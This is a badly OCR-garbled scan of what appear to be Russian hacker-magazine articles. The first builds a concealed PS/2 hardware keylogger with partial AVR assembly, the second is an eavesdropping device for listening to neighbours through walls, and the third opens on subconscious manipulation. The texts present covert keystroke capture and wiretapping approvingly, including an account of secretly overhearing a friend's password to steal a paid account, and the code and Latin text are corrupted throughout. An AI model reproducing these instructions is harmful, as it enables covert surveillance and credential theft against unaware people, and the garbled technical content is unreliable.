ПРОЦЕСС РАЗРАБОТКИ 

Любую микропроцессорную разработку надо начинать с проверенных 
временем решений. Для начала надо отладить наше устройство на го- 
товых поделках, например, с дисплеем, с сопряжением с компьютером 
ит.д. Поэтому мы взяли макетную плату с уже встроенным дисплеем и с 
полностью отлаженной процедурой работы с ним. Это необходимо было 
для того, чтобы убедиться, что клавиатуру мы видим и отслеживаем. 
Первым делом мы подали на клавиатуру питание и посмотрели на 
осциллографе процесс передачи данных от нее. Это важный момент, 
поскольку на этом этапе можно выявить некоторые недокументирован- 
ные возможности протокола, которые потом создадут большие грабли. 

К примеру, у разныхтипов клавиатур может отсутствовать или неверно 
отображаться бит четности. Нов нашем случае было все в порядке. 
Дальше мы подключили клавиатуру к процессору и попробовали просто 
ловить прерывание, не преобразуя в скан-код. Поначалу были некото- 
рые проблемьпто не ловилось, то появлялся ЕРЬ. Оказалось, что при 
запайке мы поменяли местами сигналы Сіоск и Оаіа. После их переста- 
новки все встало на свои места. Нажатия клавиш сразу отображались 
на дисплее. Первые две цифры — сколько байт было принято с момента 
подачи питания. Вторая пара цифр — последний принятый байт, третья 
и четвертая — предпоследний и последний байт соответственно. 

Эта задача, весьма простая на первый взгляд, решалась целыхтри 
дня. Сначала лезли непонятные глюки — как оказалось, фирменный 
программатор просто портил код. Когда решили эту проблему, начались 
траблы с компилятором. В общем, разработка — медленное и нудное 
занятие, но оно того стоит! 

Дальше была прикручена давно написанная библиотека работы с 
ІІАРТом для сопряжения с компьютером. Для подключения процессора 
к компьютеру использовался йАТА-кабель от мобильного телефона, и от 
него питалась вся наша схема. Для этого потребовалось разобрать сам 
кабелек, найти документацию на распиновку кабелей для мобильни- 
ков и все грамотно распаять. Когда все было сделано и программный 
код заработал вместе с аппаратной частью, мы увидели нажимаемые 
клавиши втерминальной программе. 



Последим этапом стала работа с встроенной в процессор энерго- 
независимой памятью. В нашем распоряжении было всего 128 байт 
памяти, а если учесть, что каждая клавиша занимает минимум 
3 байта (нажатие, код отжатия и код отжатой клавиши), то ее должно 
было хватить ровнона пароль от опера ци он ки, неболее.УМеги8 
512 байт ЕРРОМ, что в4разабольше, чемуТини2313, и, быть может, 
ты успеешь захватить какие-то моменты из асечной переписки. В эту 
память процедура записи изначально была циклическая: мы пишем 
в память, доходим до конца ненова пишемсначала. Получалось, что 
исходный текст затирается. Последним штрихом была дописанная 
часть программы, которая определяла конец памяти и больше не 
продолжала запись. 

Дальше мы стали приводить отладочный вариант в божеский вид. 
Сначала была сделана плата, в которой послезапайки обнаружились 
ошибки, и она была забракована — пришлось делать все заново. Потом 
мы сняли лишние отладочные функции, отточили код и исправили 
ошибки. Напоследок код был перенесен на более крутой и дорогой 
процессор АТтеда8 для увеличения ЕРРОМ. Сделано это было отчасти 
еще из-за того, что в свое время я уже делал подобную разработку, но 
не довел ее до ума, а плата осталась. И чтобы добру не пропадать, я 
заморочился и перенес код, благо это было несложно. 

На момент выхода статьи можно сливать данные через ІІАРТ, но 
только в виде скан-кодов, и дальше по бумажке их перекодировать 
(абсолютно хакерский подход — выучить все скан-коды клавиатуры 
и делать всю процедуру в уме), или использовать нашу программу 
на Паскале. Надеюсь, в конечном продукте будут реализованы все 
возможные функции. Сейчас данные сливаются посыл кой любого 
символа в порт, к которому подключен контроллер. Для этого удобно 
пользоваться специальной терминальной программой, которая 
лежит на нашем диске. 

ПРОГРАММНАЯ РЕАЛИЗАЦИЯ 

Программный код очень объемный, поэтому в статью он не влез, и ты 
можешь посмотреть его на диске — там все подробно расписано, есть 
комментарии. Но общий подход я тебе изложу. 

Программный код можно разбить на характерные функциональные 
блоки, которые выполняют конкретные поставленные задачи. Пер- 
вый блокзапускается после включения компьютера. В нем инициа- 
лизируются прерывания (прерывание от ІІАРТ и прерывание по спаду 
сигнала СЮСК), сам асинхронный приемопередатчик ака ІІАРТ. 
Очищаются и инициализируются объемы оперативной и энергонеза- 
висимой памяти. Определяется стек. Ну в общем, проводится полная 
инициализация и настойка всего оборудования. Второй основной 
блок — это обработчик прерывания от клавиатуры. О нем я расскажу 
подробнее. 
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Идея — чуть древнее нашей 
галактики. Но я до сих пор 
не видел ни одного рабочего 
образца. Респект Длинному. 
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Да, меня это тоже проперло. 

Я теперь наконец смогу поло- 
мать твой комп. В прошлый 
раз все заканчивалось на 
вводе пароля для ОрепВБй. 



Диаграмма передаваемого сигнала 



1 кДСКікк 

і НАС 

« РйШН 5 *5Ѵ|№С] 



!** Л 

V * ^ ► 



■' 1 і 



- 

■ # п # 7 

РМ 



^ оы* 

* ?ѴГ 

Ь ш 5и і'ѴССі 
6 



Распиновка разъема клавиатуры (тип < 



ІпРОНапсІІег : 



іпс КЪЬКхЗРаЦе 

шоѵ Ттрі , КЪЬКхЗРаЦе 

срі ТтрІД 

Ьгпе КЪс131іа1іе1_8 



приходитсигнал йа1:а, не ноль, это означает, что был дребезг контактов, и нас 
эти данные не интересуют — тогда все сбрасывается и начинается снова. 

КЪс13ЦаЦе1_8 : 

срі Ттрі, 10 

Ьгде КЬЬЗРаРеРаг 



Это и есть обработчик прерывания от клавиатуры. В случае падения 
фронта на пине ІКІТО, к которомуу нас подключен сигнал С1_0СК, у 
нас вызывается это прерывание. Первая команда у нас увеличивает 
счетчик принятых бит. Вторая и третья проверяют значение счетчика, 
сравнивая его с единицей. Третья: если счетчик равен единице, то это 
означает, что был принят старт-бит, и это и есть начало передачи. 



Тут мы опять смотрим количество принятых бит, но здесьуже определя- 
ется, не достигли ли мы конца. Значение должно лежать в диапазоне от 
1 до 8. Если оно больше, то, значит, это стоп -бит или бит четности. И мы 
переходим на недописанную процедуру проверки четности. Если у тебя 
есть желание, можешь ее дописать, но, как показала практика, в ней нет 
необходимости. Вероятность ошибки слишком мала. 



зЬіз КЬЬРогЦ , КЬсШаР 

гдтр ІпЪОЬЕх 

сіг КЪЬКхЗРаЪе 

гдтр ІпДОЬЕх 

Здесь мы проверяем стартовый бит. При приходе стартового бита на 
шине данных должен быть логический ноль. Если у нас на пине, куда 

Осциллограмма сигнала, снимаемого с клавиатуры 




СІС 

зЬіс КЬЬРогЦ , КЬсШаЕ 

зес 

гог КЬОБаЪа 

г^шр ІпРОЬЕх 

Очевидная часть программы. Сначала мы очищаем флаг переноса. Да- 
лее смотрим состояние порта данных, идущих от клавиатуры. Если у нас 
на входе стоит единица, то мы устанавливаем флаг переноса командой 
вес, если же ноль, то пропускаем команду установки флага. Затем мы 
задвигаем принятый бит из флага переноса в регистр КЬсЮаіа. 

КЪЬЗРаЕеРаг : 

срі Ттрі , 10 

Ьгпе КЬЬЗРаРеАзк 



Снятый лог в хексах 
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Скан-коды клавиш 



г;ітр 

КЬсЗЗДаЕеАзк : 
КЪсІЕпсІЗкаке : 
гсаіі 

СІГ 

г^шр 

ІпДОЬЕх: 

гекі 



ІпЕОЬЕх 



ЗепсІЕѵепк 

КМКхЗкаке 



ІпЕОЬЕх 



В оставшейся части мы проверяем количество последних принятых 
бит. В процедуре КЬбЭіаіеАвк должна быть проверка на четность, 
гсаіі ЭепсІЕѵепІ — вызов процедуры, которая кладет полученные 
данные в ЕРРОМ. После этого мы очищаем счетчик принятых бит и 
выходим из процедуры обработки прерывания. 

В следующем блоке у нас идет процедура записи в ЕРРОМ — энергоне- 
зависимую память, куда помещается собранное содержимое регистра 
КЬсЮаіа. Онотуда записывается с начала памяти и до тех пор, пока мы 
не исчерпаем ее объем. 

Последний блок — обработка прерывания от II АНТ. Если у нас происхо- 
дит прерывание, то мы сливаем данные разного типа, в зависимости от 
принятого символа. Но пока доступен только слив в бинарном виде, и 
для этого используется латинская буква Ь. 

Если ты внимательно просмотришь код на диске, то ты можешь встре- 
тить несколько вспомогательных процедур. Это остатки предыдущих 
программ, которые нужны были нам для отладки, но коду они совершен- 
но не мешают. Там есть процедура моргания светодиодом и процедуры 
работы с сегментными ЖК-дисплеями. 

ИТОГ 

В этой статье мы подробно рассмотрели процесс разработки и изготовле- 
ния радиоэлектронного устройства. Подобные подходы используются при 
проектировании материнских плат, мобильныхтелефонов, микроволно- 
вок, да и всей электроники в общем. Самое главное в нашей разработке 
то, что ей есть, куда расти. Ты сам, поковыряв код и разобравшись в нем, 
можешь дописать необходимые процедуры. Аесли и не дописать, то найти 
готовые в интернете. Главное — сообразить, как их пристыковать. Напри- 
мер, можно найти приемопередатчик на ІІАРТ. Таких устройств множество, 
и стоятони недорого — около$50. Немного видоизменив код, ты получишь 
передающий логгер, лог которого можно принимать на ноутбуке во дворе. 
Можно повесить внешнюю флешку на гиг, чтобы раз в месяцтолько ходить 
и собиратьлоги. Короче говоря, примененийтьматьмущая. 




Сопряжение с компьютером 



Для связи с компьютером у контроллера есть интерфейс ІІАРТ. Его можно 
подключить к СОМ-порту компьютера через такую согласующую схему. 
Это самая распространенная и уже отмирающая схема. Отмираетона 
вместе с СОМ-портами. Например, в моем ноутеуже нетСОМ-порта. И 
что же делать? Естьаналогичные микросхемы для связи. Кприме- 
ру, самая распространенная ЕТ232ВМ или ее более совершенная 
модификация с меньшим обвязом — ЕТ232Р. Эта микросхема, после 
успешной запайки и установки всех необходимых драйверов, видится 
в системе как СОМ-порт. Кстати, это важный момент для тех, у кого есть 
ноутбуки древние устройства, но нет старого доброго порта. Совмес- 
тив обе схемы, можно получить полноценный СОМ-порт, к которому 
возможно подключить модем или даже старую мышку. 

На мой взгляд, самый удобный и дешевый вариант— использовать 
шнурокот мобильного телефона. Функции он выполняеттеже, что 
и микросхема ЕТ232. Тамтоже надо поставить драйверы и чуток 
погеморроиться с распиновкой разъема. Но выигрыш в цене будет 
очевиден — это в 10 раздешевле. Мы попробовали всетри варианта 
и пришли к выводу, что шнурок для мелких поделок — идеальное 
решение. 



К сожалению, в рамках одной статьи трудно описать все использован- 
ные подходы, алгоритмы и работу с периферией. Поэтому мы ограничи- 
лись лишь кратким обзором функций нашего устройства. В остальном 
ты разберешься сам, почитав соответствующие мануалы. В общем, 
дерзай, хацкер! Учи ассемблер, паяй и смотри не попадись :1. т 
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Ухо 

большого 

брата 

Устройство для прослушки соседей 

ВЕСЬМА ИНТЕРЕСНО БЫВАЕТ, О ЧЕМ ЖЕ 
ГОВОРЯТТВОИ СОСЕДИ СВЕРХУ, СНИЗУ, 
ЗА СТЕНОЙ. КСТЕНЕ МОЖНО ПРИЛО- 
ЖИТЬУХО ИЛИ ДАЖЕ ВАЗУ, КАК В СТАРЫХ 
ФИЛЬМАХ. НО КАК ПОСЛУШАТЬ, ЧТОЖЕ 
ПР0ИСХ0ДИТВНИЗУ (ВДРУГПОЛ ГРЯЗ- 
НЫЙ ИЛИ ПРОСТО НЕУДОБНАЯ ПОЗИЦИЯ) 
ИЛИ, ЧТО ЕЩЕ СЛОЖНЕЕ, СВЕРХУ. МОЖНО 
УХИЩРЯТЬСЯ С ГАЗЕТКОЙ И СТРЕМЯН- 
КАМИ, НО МЫ -ФРИКЕРЫ -ТАКИМ ПУ- 
ТЕМ НЕ ПОЙДЕМ. СЕЙЧАС Я РАССКАЖУ 
ТЕБЕ, КАК ИЗ ПОДРУЧНЫХ СРЕДСТВ ЗА 
ПОЛЧАСА СДЕЛАТЬ ОТЛИЧНУЮ ПРО- 
СЛУШКУ СОСЕДЕЙ ЧЕРЕЗ СТЕНЫ. 



исходники 

Я стараюсь следовать традиции, начало которой положил мой уважаемый 
учитель Федя Добрянский, и потому мы будем собирать наш девайс из 
подручных материалов. Нам потребуется несколько предметов, которые 
есть в доме любого начинающего фрикера: старый кассетный плеер (можно 
с неисправным механизмом, главное, чтобы усилительная часть работала), 
наушники, батарейки к плееру, кварцевая пищалка из часов или музыкаль- 
ной открытки (чем крупнее она будет, тем лучше будетзвучание). Пищалку 
в принципе можно и купить, например, в каком-нибудь радиоэлектронном 
магазине. Если ее достать неудастся, то с горем пополам можно использо- 
вать динамик из старого наушника «капелька» или от РС-спикера. 

ИЗГОТОВЛЕНИЕ УСИЛИТЕЛЯ 

Последний раз смотрим на плеер и прощаемся с ним как с функциональ- 
ным устройством воспроизведения звука. Сейчас он превратится в крутой 




фрикерский девайс. Для начала мы его разберем. Плееры имеют разную 
конструкцию, и универсальных советов по их разбору я недам, этот процесс 
остается под твою ответственность. Могу сказать, что мне на разборку пле- 
ера понадобился целый час, поскольку простым выкручиванием винтиков 
было не обойтись, а разламывать корпус я не хотел. Будем считать, что 
всеми правдами и неправдами, возможно, слегкими потерями корпуса ты 
таки его разобрал. 

Далее смотрим конструкцию. Механика плеера нас не интересует, ее 
можно смело отделять отосновной платы и выбрасывать. Мне оказалось 
достаточно откусить провода, идущие к двигателю, чтобы с некоторыми 
усилиями отделить ее от основной платы. 

Теперьсмотрим, как присоединяется головка плеера. Сама головка нам 
тоже не нужна, поэтому аккуратно ее отпаиваем. Там должно бытьтри про- 
вода: общий, который является оплеткой, и два провода на каждый канал 
(левое и правое ухо). Смело спаивай их вместе, если ты не собираешься 
слушать соседей стерео. 

Теперь момент, оказавшийся для меня довольно сложным: я вставил бата- 
рейки и собирался запустить плеер. Но как? Кнопочки Ріау нету, но вклю- 
чить его как-то нужно! В конкретно моей модели плеера была такая фича: 
кнопка воспроизведения опускала головку плеера и механикой нажимала 



изо 
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секретную кнопочку, которая подавала питание на всю схему. 
Вот ее и надо найти. На обратной стороне платы находим 
выводы контактов этой кнопки и напаиваем на них провода. В 
своих закромах я нашел великолепную кнопочку отечествен- 
ного производства, которая великолепно встала в отверстие 
отсутствующей кнопки Ріа у. К ней на замыкание припаиваем 
два провода, идущих от нашей кнопки. Теперь наша кнопка 
будет за пускать усилительную схему плеера. 

Вернемся к проводам от головки плеера — это самое чувстви- 
тельное место нашего устройства. Еслиты сейчас попробуешь 
вставить в плеер батарейки и подключить нему наушники, 
тоты сможешь слышать касание к этому проводочку — это 
наводки ствоеготела. Я счел провода, идущие к головке, 
слишком короткими и удлинил их найденным экранирован- 
ным кабелем. Такой кабель можно найти у старых осциллогра- 
фов или внутри телевизоров, в крайнем случае можно взять 
провод от наушников, но это уже неспортивно. Центральную 
жилу этого провода нужно спаять вместе с проводочками 
левого и правого канала, затем заизолировать изолентой и 
потом спаять оплетки проводов. Я выпустил этотудлиненный 



провод через дырку, оставшуюся от кнопки перемотки. 

Теперь припаиваем акустический датчик. В качестветеста 
можно припаять любой динамик. Перед сборкой плеера нужно 
исхитриться и подать на него питание. Я просто подпаял 
батарейки на проводах, предварительно спаяв их между 
собой. Нажимаем нашу чудо- кнопочку и слушаем. Еслиты 
услышишь в наушниках звуки в комнате (можешь погугукать, 
пошуршать ит. п.), значит все сделано правильно. Ежели нет, 
то ищи косяки в плате: не оторвал ли какой важный проводок, 
все ли туда запаял ит.п. Если все запустилось, можносмело 
собирать плеер обратно без механических кишок. После сбор- 
ки рекомендую еще раз все проверить, чтобы убедиться, что в 
процессе ты ничего не оторвал. 

ЭЛЕКТРОННОЕ УХО 

Самое ответственное место нашего устройства — акусти- 
ческий датчик. От качества его изготовления будетзависеть 
работоспособность всего нашего девайса. До работы в 
«Хакере» я сконструировал множество акустических датчиков 
для обследованиятрансформаторов. Поэтому за основуя взял 
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ІСпасибо ФедеІ 



Я вырос на журнале «Хакер» и покупал его прежде всего из-за поделок 
уважаемого Феди Добрянского. Делая их, совершенствуя свои навыки 
чтением различной литературы и экспериментируя со схемами, я стал, 
кажется, неплохим фрикером. Стараясь во всем подражать своему настав- 
нику, я везде искал нетрадиционный и простой подход. Самое интересное, 
что Федя даже не знал о моем существовании, познакомился яснимлишь 
спустя блетпосле начала обучения. Когда в редакции насувидели вместе, 
то решили сначала, что мы братья. Потом, разобравшись, поняли, что мы 
только познакомились. У насу обоих бешеный взгляд, длинные волосы; 
мы оба юзаем только трекболы, фанатеем отэлектроники и железа в целом 
и имеем безумное количество маниакальных идей, которых другим не 
понять. 

В моментзнакомства мы засели в редакции и начали обсуждать различ- 
ныетемы: перспективы компьютерной индустрии, различные электронные 
поделки, которые работают, а наука не может объяснить как — множество 
тем. Возле нассобралась половина редакции, все внимательно слушали 
двух маньяков и, какбыло видно по ихлицам, не понимали даже трети того 
сленга, на котором мы общались. Но мы говорили на одном языке, одина- 
ково одержимо и красноречиво. Подражание человеку, котороготы даже 
незнаешь, делаеттебя похожим на него. В редакции главред «Железа» 
сразу окрестил меня «Клон Добрянского», хотя, разумеется, есть вещи, 
в которых мы с ним совершенно не похожи, но это только на пользу нам 
обоим. Уважаемыйтоварищ Добрянский уже давно не брал в рукидетектор 
лжи — паяльник, но дело его живо и будетжить. И я буду продолжать его 
дело в журнале. 



конструкцию именнотаких датчиков, но сделанных из подручных средств. 
Наш микрофон-датчикбудет резонаторным — корпус микрофона будет 
резонировать созвучно принятому сигналу. Давным-давно, назаре моей 
журналистской деятельности, у меня на пару с Генри Шеппардом была 
опубликована статья «Пивная акустика». В этой статье мы рассказы- 
вали, каксделать колонки из пивных банок. Коротко говоря, в качестве 
резонатора у нас выступали жестяные банки. Потому решение для нашего 
сегодняшнего девайса образовалось само собой — за юзать те же баночки. 
Но, забегая вперед, скажу, что в дальнейшем я слегка разочаровался в 
этом подходе. Банка резонирует в основном на своей частоте, и в наушни- 
ках можно слышать характерный гул. Вместо банки можно использовать 
кухонныетарелки, вазы, стаканы и прочую посуду. Для меня же банка была 




Эпоксидка после прогрева 




Отделяем механику отэлектроники 




самым простым и дешевым решением, поэтому о ней я и поведаю. Ноты 
вполне можешь поэкспериментировать с другой посудой, не забудь напи- 
сать мне о результатах своих опытов. 

Для изготовления датчика-микрофона нам понадобится сама пищалка, пив- 
ная банка и эпоксидная смола. Начнемстого, что убедимся, запаян ли наш 
микрофончик: оплетка — на один контакт, а центральная жилка — на другой. 
Сам кварц мы будем вклеивать в днище банки, оно будто предназначено 
специально для этого. Чтобы лучше держалось, «впуклость» на дне банки 
можно обработать шкуркой и обезжирить ацетоном (при желании). 

Теперь готовим эпоксидную смолу. Внимательно прочитай инструкцию к 
эпоксидке. Надо смешать отвердитель с эпоксидной смолой в определен- 
ных пропорциях: одна риска эпоксидки на одну риску отвердителя. Мне 
эпоксидки нужно было меньше чем на одну риску, и я смешивал в меньших 
объемах, но соблюдая пропорции. Если ты неуверен в своих силах, то 
лучше смешивать в отдельной таре. Я же все делал сразу на дне банки. 

Как слил две жидкости вместе, их нужно тщательно перемешать, причем 
стараясь не допускать образования пузырьков, так как они будут мешать 
хорошей акустике нашего датчика или попросту глушитьзвук. Должна 
получиться матовая смесь; кактолько она получилась, все — клей готов. 
Теперь соберем все вместе — в днище банки. Сначала клей, потом акку- 
ратно погружаем в него наш микрофон. Не забудь, что все провода должны 
быть запаяны, после застывания клея ты их уже не припаяешь! Если твой 
датчик всплывает из эпоксидки, можно его придавить чем-нибудь, что не 
жалко оставить на века в смоле, например пятирублевой монетой. Правда 
она можетухудшить качество звука. Все, после застывания и схватывания 
клея девайс готов купотреблению. 

Для тестирования включи музыку в соседней комнате и попробуй ее по- 
слушать нашим чудо-девайсом через стенку. Только не выводи громкостьу 
плеера на полную мощностьты будешь слышать, даже какутебя колышется 
провод, идущий к датчику, и такая мелочь может очень сильно оглушить. 

Та к что будь аккуратен. 

ДЛЯ ОСОБЫХ МАНЬЯКОВ 

Лично мне совершенно не хотелось ждать 24 часа, пока застынет эпоксид- 
ная смола. Почитав инструкцию, я понял, что она застынетбыстрее, если 
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ее разогреть. Недолго думая я взял свой газовый паяльник и начал разо- 
гревать банку вблизи днища. Но чуток перестарался. В один прекрасный 
момент (который для меня был совершенно не прекрасным) эпоксидка на- 
чала застывать, но при этом еще и кипеть (на фотографиях видно, что клей 
хорошенько вспенен). При кипении капли эпоксидной смолы разлетались 
во все стороны, забрызгивая все окружающее пространство и застывая 
на предметах, на которые они попадали. Несмотря на весьтворившийся 
ужас, буквально через полчаса после заливки датчика я получил готовое 
устройство. Дело было в 2 часа ночи, но мне безумно хотелось его тут же 
затестить. В результате я врубил музыку и пошел в другую комнату слушать. 
Обрадованный результатами, я послушал все, начиная отхолодильника и 
заканчивая бачком отунитаза. В конце концов в дверь ко мне позвонили 
люди в погонах, но я им не открыл — хрен им! Однако музычку, которая 
радовала соседей, и мой гомерический хохот при выявлении новыхтихих 
звуков пришлось немного приглушить. 

ИСПЫТАНИЕ 

На следующий день я прослушал все смежные с соседями стены и 
узнал много нового. Оказалось, что сосед снизу прячет бутылку водки 
от жены в сливном бачке — это он рассказывал на пьянке друзьям. 
Товарищ сверху изменяет жене, когда та на работе, развлекаясь с лю- 
бовницей на семейном ложе. Вобщем, на меня обрушился громадный 
ворох интересной, но достаточно бесполезной информации. 
Остановиться на этом было бы преступлением перед фрикерской 



совестью, и я отправился к то вар ищу, безумно озабоченному собствен- 
ной безопасностью. Обычно, если он сообщает кому-то пароли и явки, 
он старается уйти в другую комнату и говорить максимально тихо. Придя 
к нему, я прикинулся сибирским мальчиком, который решил вспомнить 
молодость и послушать кассетный плеер. И здесь меня ожидала боль- 
шая удача. Когда мы сидели у него и затирали за жизнь, ему позвонили. 
Один наш общий приятель просил пароль от платного сервиса. Мой 
друг, разумеется, нежелающий разбазаривать собственные деньги, 
постарался деликатно отказать. Но товарищ настаивал и обещал запла- 
тить. Да и, впрочем, человек был надежный — не из кидал. Согласив- 
шись, мой друг вышел в другую комнату, чтобы я не слышал произно- 
сим ыеимлоги ни пароль. Быстро одев наушники и достав из-за пазухи 
банку, я прислонил ее к стенке, параллельно записывая на бумажку все 
данные. Ура! Гигабайты бесплатных трЗуменя в кармане. Наконец-то 
я нашел способ доказать, что любая защита пробиваема. Если файрвол 
обойти не удается, вступает в действие социальная инженерия и фри- 
керские примочки. 

ИТОГ 

Ты всегда можешь сделать крутейшее фрикерское устройство из подруч- 
ных материалов. Главное — уметь правильно применять фантазию. Каж- 
дый раз, когда я нахожу дома бесхозную электронную и не только вещицу, 
я всегда думаю: что из нее можно сваять, чтобы и себя порадовать, и над 
другими поглумиться. нс 
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ЭТОЙ СТАТЬЕЙ МЫ ОТКРЫВАЕМ НОВУЮ РУБРИКУ. ХВАТИТ УЖЕ ХАКАТЬ ТОЛ ЬКО 
ПРОГРАММЫ! ПОЧЕМУ БЫ НАМ НЕЗАНЯТЬСЯ (ПОД)СОЗНАНИЕМ И НЕ ВЫРАБОТАТЬ 
ПРИЕМЫ ЗАЩИТЫ ПРОТИВ СКРЫТОГО УПРАВЛЕНИЯ И МАНИПУЛИРОВАНИЯ? МЫ- 
ЩЪХ ПОПЫТАЕТСЯ РАСКРЫТЬ РЕАЛ ЬНЫЕ ТЕХНОЛОГИИ МАНИПУЛИРОВАНИЯ С 
КУЧЕЙ ПРИМЕРОВ, ЧТОБЫ КАЖДЫЙ МОГ ПРОВЕРИТЬ, РАБОТАЮТОНИ ИЛИ НЕТ. А 
ПРОВЕРЯТЬТУТ ЕСТЬ ЧТО: ОТ «ДИЗАССЕМБЛИРОВАНИЯ» РЕКЛАМНЫХ РОЛИКОВ 
И РЕПОРТАЖНОЙ СЪЕМКИ ДО ПРАКТИЧЕСКОЙ ВЫГОДЫ (ЗАТАЩИТЬ ПОТРЯСАЮЩЕ 
КРАСИВУЮ ДЕВУШКУ В ПОСТЕЛЬ, ПОДМЯТЬ ПОД СЕБЯ НАЧАЛЬНИКА, РАСШИРИТЬ 
С03НАНИЕД0 ГРАНИЦ ВСЕЛЕННОЙ И ПОСТИЧЬВЕЩИ, СОВЕРШЕННО НЕПОСТИЖИ- 
МЫЕ ДЛЯ ОКРУЖАЮЩИХ). И ВСЕЭТО, ПОВТОРЯЮСЬ, НА КОНКРЕТНЫХ ПРИМЕРАХ И 
БЕЗ ГРИБОВ! 
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МАНИПУЛИРОВАНИЕ (ПОД)СОЗНАНИЕМ 

(Под)сознанием можно манипулировать, (под)сознание можнохачить. 
Существует множество приемов реального манипулирования (подсоз- 
нанием, примером которых служитживопись, фотография и другие 
виды искусств. Если фотография не пробуждает никаких чувств, не вы- 
зывает ни мыслей, ни эмоций — она безлика и отправляется в мусорку. 
Если же пробуждает, то это и есть манипулирование. 

Манипулирование используется повсеместно: в рекламном бизнесе, в 
фоторепортажах, в политической пропаганде и т.д. Об этом пишут мно- 
го, но все больше не то. Малая толика подлинных рекламных трюков 
описана в «бепегаііоп «П» и «Шлемеужаса» Пелевина, но... это даже 
не верхушка айсберга, а всего лишь ее бледный отблеск. 

Психология восприятия — это целая наука! Не то чтобы сильно засек- 
реченная, просто совершенно перпендикулярная интересам большин- 
ства обывателей, запуганных 25-м кадром и прочими мифическими 
эффектами. На самом деле (под)сознание оперирует простейшими 
элементами, такими как фигура, контрформа, тон, симметрия, позво- 
ляющими создавать определенное бессознательное настроение от 
воспринимаемого независимо от смысловой нагрузки. 

На следующем уровне восприятия в игру включается сознание, соби- 
рающее световые и цветовые пятна в одну охапку и интерпретирующее 
их, скажем, как фи гуру солдата. Специально подобранной комбинацией 
световых пятен легко создать глубокий бессознательный дискомфорт, вы- 
зывающий мощный психологический протест (между прочим, совершенно 
иррациональный протест). И теперь солдат (смысловой центр композиции) 
предстает перед нами в образе заклятого врага! Учти, что на место солдата 
можно поставить любой одушевленный или неодушевленный объект. Ана- 
логичным образом внушаются и позитивные мысли, к примеру, вызывается 
симпатия к политику, собирающемуся победить на выборах... 
Манипулирование (под)сознанием крайне интересно и актуально. Но в 
современной литературе оно описывается преимущественно на уровне 
мифов, которые довольно сложно проверить. Ходит множество легенд 
(большей частью бредовых и неверных), кочующих из одного издания 
в другое, а как работает ( подсознание, никто и не знает. А людям, как 
известно, свойственно бояться того, чего они не знают. Отсюда и па- 
нические страхи. Возможности по управлению (под) сознан и ем через 
аудиовизуальные средства слишком преувеличены, и в то же самое 
время сильно преуменьшены. Воттакой получается парадокс. 

ВВЕДЕНИЕ В ПОДСОЗНАНИЕ 

Подсознание не знает таких понятий, как автомобиль, женщина 
(неважно, обнаженная или нет), бутылка пива/пепси, пачка сигарет. 



Подсознание не знает ни русского, ни английского, ни какого-либо 
другого языка. 

Подсознание оперирует простейшими вещами: фигура на плоскости, 
тон, цвет, подобие и контраст. Управление подсознанием осуществля- 
ется посредством взаимодействия двух и более фигур, совпадающих 
потону, форме или массе (причем подобие по цвету сильнее подобий 
размеров или форм). Такое взаимодействие называется изобразитель- 
ной связью. 

А вот пример, причем весьма наглядный, выявляющий подлинную 
натурутак называемой «документальной» репортажной съемки, воз- 
действующий на подсознание и бьющий точно в цель. 

Рассмотрим снимок Эрвита Эллиота, сделанный в 50-х годах (смотри 
левую часть рисунка под названием «Репортажный снимок Эрвита 
Эллиота со скрытым подтекстом, адресованным подсознанию»). На 
первый взгляд, обычный репортажный снимок, ктому же не слишком 
удачный (плохое кадрирование, отчетливый смаз). Ну негр, ну разде- 
ление поилокдля белых (ѵѵЬіІе) и цветных (соіогесі). Чем-то напоминает 
дифференциацию по цвету штанов из фильма «Кин-дза-дза!». Будь я 
негром, мне было бы все равно («Вам шашечки или ехать?»). Нотут все 
нетак просто! 

Фотография каким-то неведомым для обывателя образом подчеркива- 
ет расовый конфликт, заставляя задуматься о проблеме расового нера- 
венства и прочих сопутствующих вопросах, несмотря на то что прямых 
указаний и лозунгов в духе «Спасайте негров!» здесь нет. 

Александр Лапин (искусствовед, автор двух книг по фотографии) как-то 
взял и слегка притемнил белую рубашку негра (смотри правую часть 
указанного рисунка). Кажется, ничего не изменилось, но... расовый 
конфликт внезапно ослаб, а вместе с ним ослаб и весь замысел фото- 
графа. Попытаемся понять, почемутак произошло. Согласись, что на 
рациональном уровне восприятия цвет рубашки персонажа фотогра- 
фии никакой роли не играет. Сюжет ведь отэтого не меняется. 

Все дело в том, что мы воспринимаем композицию с помощью двух 
уровней восприятия: сознательного и бессознательного, причем бессоз- 
нательный уровень воздействует на сознательный весьма прозаичным 
путем, донося до него информацию, которая не может быть выражена ни 
текстом, ни каким-либо другим рациональным способом. 

Анализ композиции выявляет два смысловых фокуса, расположенных на 
периферии симметрично относительно центра: мойка для белых и негр, 
склонившийся над мойкой для цветных, причем сильная тональная 
связь рубашки черного негра с поилкой для белых создаетсмысловой 
контраст. Глаз попеременно переходит от одного смыслового центра к 
другому, заставляя мозг сопоставлять первое со вторым, интерпре- 
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ІЗолотое сечение и способ его вычисления! 



тируя это как конфликт изооразительнои целостности и смысловой 
разобщенности. Это и есть то самое зашифрованное послание, которое 
проникает в подсознание, заставляя нас неосознанно становиться на 
сторону черных. А вот если притемнить рубашку, ее тональная связь с 
белой раковиной немедленно исчезает, композиция рассыпается на 
независимые составляющие и негры остаются неграми, а никакими не 
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_Примеры хогартовых линий с центростремительным (слева) и центробеж-| 
Іным движением взгляда (справа)!^ 



афроамериканцами, на защиту которых нас подсознательно призывают 
становиться. 

«Пропаганда утрачивает силу, кактолько становится явной», — говорил 
Геббельс. Только что мы рассмотрели пример неявной пропаганды, 
причем очень хороший пример. Ты все еще веришь в то, что журнали- 
стика можетбыть документальной? 

ТЕОРИЯ ВОСПРИЯТИЯ: КОРОТКИЙ ЛИКБЕЗ ДЛЯ 
НАЧИНАЮЩИХ 



естественно и легко, а вот подъем — со значительным напряжением. 
Психологи связывают это с традициями левостороннего письма, при- 
учившего человека неосознанно перемещать взгляд слева направо. 
Однако тот же самый эффект наблюдается и у народов, придержи- 
вающихся других форм письма. Возникает вопрос: а не путаем ли мы 
причину со следствием? Может быть, традиция левостороннего письма 
как раз и возникла под влиянием психофизических особенностей 
подсознания? 

Как бы там ни было, это свойство можно смело использовать. Изо- 



Сейчас будет немного скучно. Но без знания основ психологии воспри- 
ятия совершенно невозможно манипулировать сознанием точно также, 
как невозможно ломать программы без знания ассемблера. 

Рассмотрим прямоугольник кадрового пространства (частным случаем 
которого является квадрат) и зададимся вопросом: куда направлен наш 
взгляд? Стандартный ответ: взгляд цепляется за сюжетно-значимые 
элементы (например, обнаженная девушка). На самом деле существует 
